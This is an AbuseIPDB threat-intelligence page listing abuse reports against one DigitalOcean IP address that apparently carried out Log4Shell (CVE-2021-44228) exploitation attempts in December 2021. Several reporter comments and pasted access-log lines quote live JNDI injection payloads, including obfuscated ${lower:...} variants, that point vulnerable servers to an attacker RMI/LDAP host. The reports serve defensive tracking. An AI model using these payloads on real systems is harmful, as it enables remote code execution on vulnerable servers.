AbuseIPDB » 167.99.115.242

167.99.115.242 was found in our database!

This IP was reported 13 times. Confidence of Abuse is 0%: ?

0%

ISP	DigitalOcean LLC
Usage Type	Data Center/Web Hosting/Transit
Domain Name	digitalocean.com
Country	United States of America
City	Clifton, New Jersey

IP info including ISP, Usage Type, and Location provided by IP2Location. Updated monthly.

Report 167.99.115.242

Whois 167.99.115.242

IP Abuse Reports for 167.99.115.242:

This IP address has been reported a total of 13 times from 12 distinct sources. 167.99.115.242 was first reported on December 16th 2021, and the most recent report was 6 months ago.

Old Reports: The most recent abuse report for this IP address is from 6 months ago. It is possible that this IP is no longer involved in abusive activities.

Reporter	Date	Comment	Categories
Anonymous	23 Dec 2021	attack log4j	Web App Attack
Anonymous	23 Dec 2021	attack log4j	Web App Attack
Anonymous	22 Dec 2021	LOG4J via UserAgent "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/binary}"	Bad Web Bot
Parth Maniar	21 Dec 2021	This IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For mor ... show moreThis IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For more information, or to report interesting/incorrect findings, give me a shoutout on @parthmaniar on Twitter. show less	Hacking Web App Attack
Andre	21 Dec 2021	log4j	Hacking
theEngineer	21 Dec 2021	Multiple Log4j attacks	Hacking Brute-Force Web App Attack
Moy3	21 Dec 2021	${jndi:ldap://167.99.115.242:1389/Binary}	Exploited Host
Fox River Dan	20 Dec 2021	10.mobinnet.net - - [20/Dec/2021:20:40:39 -0600] "GET / HTTP/1.1" 302 148 "${${lower:jndi}:${lower:r ... show more10.mobinnet.net - - [20/Dec/2021:20:40:39 -0600] "GET / HTTP/1.1" 302 148 "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "(node: 0)" 10.mobinnet.net - - [20/Dec/2021:20:40:40 -0600] "GET /public/default.wct HTTP/1.1" 200 13318 "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "(node: 0)" 10.mobinnet.net - - [20/Dec/2021:20:40:41 -0600] "GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D HTTP/1.1" 401 7328 "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}" "(node: 0)" show less	Hacking Exploited Host Web App Attack
Anonymous	20 Dec 2021	log4j (log4shell) attempt	Web App Attack
tjs	20 Dec 2021	CVE-2021-44228	Hacking
user23279	20 Dec 2021	CVE-2021-44228 Log4j RCE	Hacking Web App Attack
backslash	17 Dec 2021	log4j	Bad Web Bot
RoboSOC	16 Dec 2021	Apache Log4j Remote Code Execution Vulnerability, PTR: PTR record not found	Hacking

Is this your IP? You may request to takedown any associated reports. We will attempt to verify your ownership. Request Takedown 🚩